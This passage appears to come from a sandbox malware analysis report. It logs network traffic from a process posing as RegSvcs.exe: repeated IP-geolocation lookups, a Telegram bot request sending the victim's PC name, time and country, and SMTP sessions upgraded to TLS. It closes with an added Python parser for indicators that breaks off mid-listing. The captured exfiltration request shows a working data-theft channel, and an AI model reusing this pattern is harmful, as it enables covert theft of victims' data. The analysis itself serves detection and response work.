2024-10-09 12:45:16 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-09 12:45:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.12 | 49713 | 188.114.96.34 | 443 | 7020 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-09 12:45:16 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
2024-10-09 12:45:17 UTC | 674 | IN | HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 12:45:17 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 35798
    Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F1J2Cdjq9QL0KwhRss7gR4AgLniO6375fsYHvQEvn2RQQOHBlT9u8gSfNjjPjT%2BPh7Lcxei5eUnpE4vJPjg1sdUc0zLLuKp8I3Q7a4LWkny1vkk%2BHj02n4WmF4BQrdTcKpS2uMRA"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8cfe7785bc6f5e66-EWR
2024-10-09 12:45:17 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-09 12:45:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID:2
Source IP:192.168.2.12
Source Port:49715
Destination IP:188.114.96.3
Destination Port:443
PID:7020
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-09 12:45:18 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-09 12:45:19 UTC | 682 | IN | HTTP/1.1 200 OK
Date: Wed, 09 Oct 2024 12:45:19 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 35800
Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rtVOL8vze0F9tZGoS6ZWQB5FXA15%2BnUjvuK69Xt1riVRgRyb5fyB%2FgPaLjSpVyWcS%2BfOIzVUENo9NYpVJL36hpLhSRlYkLVxeyWUE9r1W4RQzQR27JRNeTE%2FARjcOBVHmC%2F%2BI5i0"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cfe7791ef598c3c-EWR
2024-10-09 12:45:19 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-09 12:45:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:3
Source IP:192.168.2.12
Source Port:49717
Destination IP:188.114.96.3
Destination Port:443
PID:7020
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-09 12:45:21 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-09 12:45:21 UTC | 674 | IN | HTTP/1.1 200 OK
Date: Wed, 09 Oct 2024 12:45:21 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 35802
Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OFTnXRKWfHoP54YzxEv%2BsgxVHeGQrPCbb5XNk3Vlg6UZvvnCIDgb7nUdnXU2RXzSdROD1NTbLPX%2BlU7hss2hMbNU1scmFWZZ2csz2JF1IYXUERDwm7oCLosPojGUMlxAZKDciF3w"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cfe77a06de741cf-EWR
2024-10-09 12:45:21 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-09 12:45:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:4
Source IP:192.168.2.12
Source Port:49720
Destination IP:188.114.96.3
Destination Port:443
PID:7020
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-09 12:45:22 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-09 12:45:22 UTC | 670 | IN | HTTP/1.1 200 OK
Date: Wed, 09 Oct 2024 12:45:22 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 35803
Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r7hTvzEjEp23si1kCyjszSVNwa9W6FyIxv4SQ9VxmCor51X4YVai0fG5HCnkZerBJluF2Nt8Oz2EgBaNYcqkdgRdAUajHmlNLrXyFvPXgki3pHWJElF5fjeEFUeJdsq05jpGrhUJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cfe77a85ab942f2-EWR
2024-10-09 12:45:22 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-09 12:45:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:5
Source IP:192.168.2.12
Source Port:49722
Destination IP:188.114.96.3
Destination Port:443
PID:7020
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-09 12:45:23 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-09 12:45:23 UTC | 676 | IN | HTTP/1.1 200 OK
Date: Wed, 09 Oct 2024 12:45:23 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 35804
Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=REFHuOyLznptzUY4IsW66MXILoWiT0%2Bcg9%2FDMEyIJgEQXeQrHW2ijtGw6gmNeS9Q1JUqAFs9XQComXgxZSdloKXMrxVOqUS4zgt4VTaLtvhi2FHbajIus%2FihFvdDvqOHZ8AEJ1Ra"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cfe77b03efa1988-EWR
2024-10-09 12:45:23 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-09 12:45:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:6
Source IP:192.168.2.12
Source Port:49724
Destination IP:188.114.96.3
Destination Port:443
PID:7020
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-09 12:45:25 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-09 12:45:25 UTC | 682 | IN | HTTP/1.1 200 OK
Date: Wed, 09 Oct 2024 12:45:25 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 35806
Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aES0F1gUnR0f%2Bs5VrKBLO3%2FkdkW79faiC9ZlQnFSuj0%2Bj1HB0CKlQGUNbDPQijrtilUPF8GxhfDxUhE55NbNJrVtDGNH%2B0UpHQNQLO6Jk%2BYFfFoTgZ%2FHUeyXAmfyHEu1a1HqsTWV"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cfe77b86fba430e-EWR
2024-10-09 12:45:25 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-09 12:45:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:7
Source IP:192.168.2.12
Source Port:49729
Destination IP:188.114.96.3
Destination Port:443
PID:7020
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-09 12:45:26 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-09 12:45:26 UTC | 676 | IN | HTTP/1.1 200 OK
Date: Wed, 09 Oct 2024 12:45:26 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 35807
Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jap6XV2GsIg2vAhPRe3mI31jbJp2IoRMFTO%2BNBZ6bSeXLvICDjivBPjeH14edT2m%2FeO1Lk8PABu4vm1n7tVTiEoUyhAtvOeIshIxthyIpyfjXrEmIkosLzFmQa1FaBqQCJ%2BPIkvK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cfe77c028480f67-EWR
2024-10-09 12:45:26 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-09 12:45:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:8
Source IP:192.168.2.12
Source Port:49733
Destination IP:188.114.96.3
Destination Port:443
PID:7020
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-09 12:45:27 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-09 12:45:27 UTC | 702 | IN | HTTP/1.1 200 OK
Date: Wed, 09 Oct 2024 12:45:27 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 35808
Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3jLRHvBaMQ1QZYxsZdjXChvr37kTrvB3PjnSVS0l3fBG5fzHcRtsPMOOYJAh22iQkvbPN8M3TxNb1pHpfrAQiBS6qEQZ0GdoJYeCPhBVDmMA4LOG%2Ft204w5pxUdZhHK2mt1mZajE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cfe77c7dd67430a-EWR
alt-svc: h3=":443"; ma=86400
2024-10-09 12:45:27 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-09 12:45:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:9
Source IP:192.168.2.12
Source Port:49735
Destination IP:149.154.167.220
Destination Port:443
PID:7020
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-09 12:45:29 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2009/10/2024%20/%2023:08:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-10-09 12:45:29 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Wed, 09 Oct 2024 12:45:29 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-09 12:45:29 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                              TimestampSource PortDest PortSource IPDest IPCommands
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Oct 9, 2024 14:45:36.786866903 CEST | 587   | 49736 | 46.151.208.21 | 192.168.2.12  | 220 host.ibtikarat.net ESMTP Exim 4.95 Wed, 09 Oct 2024 15:45:37 +0300
Oct 9, 2024 14:45:36.787121058 CEST | 49736 | 587   | 192.168.2.12  | 46.151.208.21 | EHLO 841618
Oct 9, 2024 14:45:37.050111055 CEST | 587   | 49736 | 46.151.208.21 | 192.168.2.12  | 250-host.ibtikarat.net Hello 841618 [8.46.123.33]
                                    |       |       |               |               | 250-SIZE 52428800
                                    |       |       |               |               | 250-8BITMIME
                                    |       |       |               |               | 250-PIPELINING
                                    |       |       |               |               | 250-PIPE_CONNECT
                                    |       |       |               |               | 250-AUTH PLAIN LOGIN
                                    |       |       |               |               | 250-STARTTLS
                                    |       |       |               |               | 250 HELP
Oct 9, 2024 14:45:37.050338984 CEST | 49736 | 587   | 192.168.2.12  | 46.151.208.21 | STARTTLS
Oct 9, 2024 14:45:37.352309942 CEST | 587   | 49736 | 46.151.208.21 | 192.168.2.12  | 220 TLS go ahead
Oct 9, 2024 14:45:43.868622065 CEST | 587   | 49737 | 46.151.208.21 | 192.168.2.12  | 220 host.ibtikarat.net ESMTP Exim 4.95 Wed, 09 Oct 2024 15:45:44 +0300
Oct 9, 2024 14:45:43.868843079 CEST | 49737 | 587   | 192.168.2.12  | 46.151.208.21 | EHLO 841618
Oct 9, 2024 14:45:44.140444994 CEST | 587   | 49737 | 46.151.208.21 | 192.168.2.12  | 250-host.ibtikarat.net Hello 841618 [8.46.123.33]
                                    |       |       |               |               | 250-SIZE 52428800
                                    |       |       |               |               | 250-8BITMIME
                                    |       |       |               |               | 250-PIPELINING
                                    |       |       |               |               | 250-PIPE_CONNECT
                                    |       |       |               |               | 250-AUTH PLAIN LOGIN
                                    |       |       |               |               | 250-STARTTLS
                                    |       |       |               |               | 250 HELP
Oct 9, 2024 14:45:44.140820980 CEST | 49737 | 587   | 192.168.2.12  | 46.151.208.21 | STARTTLS
Oct 9, 2024 14:45:44.415576935 CEST | 587   | 49737 | 46.151.208.21 | 192.168.2.12  | 220 TLS go ahead
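The two SMTP sessions above (client ports 49736 and 49737, about seven seconds apart) are identical up to "220 TLS go ahead", after which the capture shows nothing: AUTH, MAIL FROM, RCPT TO and DATA all travel inside TLS. The following parser is an added example, not code from the Joe Sandbox report or from the sample. It walks one cleartext session, records what the server advertised and what the client did before the TLS upgrade, and lists the points a responder would take from it. The CAPTURED_SESSION list is constructed from the table above with "C"/"S" direction markers added by hand; the indicator wording is the author's, not the report's.

```python
"""Parse the cleartext prefix of an SMTP submission session and list the
indicators a responder can take from it.  Added example; not part of the
Joe Sandbox report or the analysed sample."""
from dataclasses import dataclass, field

# Constructed from the exchange captured above (client 192.168.2.12:49736 to
# 46.151.208.21:587).  "C" = client (sandbox VM), "S" = server.  The multi-line
# 250 reply is kept one line per entry, as the server sent it.
CAPTURED_SESSION = [
    ("S", "220 host.ibtikarat.net ESMTP Exim 4.95 Wed, 09 Oct 2024 15:45:37 +0300"),
    ("C", "EHLO 841618"),
    ("S", "250-host.ibtikarat.net Hello 841618 [8.46.123.33]"),
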